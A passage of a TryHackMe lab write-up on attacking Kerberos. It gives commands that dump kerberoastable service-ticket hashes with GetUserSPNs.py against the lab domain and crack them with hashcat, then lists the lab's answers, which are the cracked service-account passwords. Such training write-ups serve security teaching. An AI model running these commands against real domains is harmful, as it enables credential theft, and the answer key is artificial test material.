hermh4cks/Write-ups/TryHackMe/Attacking Kerberos.md

 2.) sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.20.101 -request - this will dump the Kerberos hash for all kerberoastable accounts it can find on the target domain just like Rubeus does; however, this does not have to be on the targets machine and can be done remotely.

 3.) hashcat -m 13100 -a 0 hash.txt Pass.txt - now crack that hash

+### Questions

+1. What is the HTTPService Password?

+: Summer2020

+2. What is the SQLService Password?

+: MYPassword123#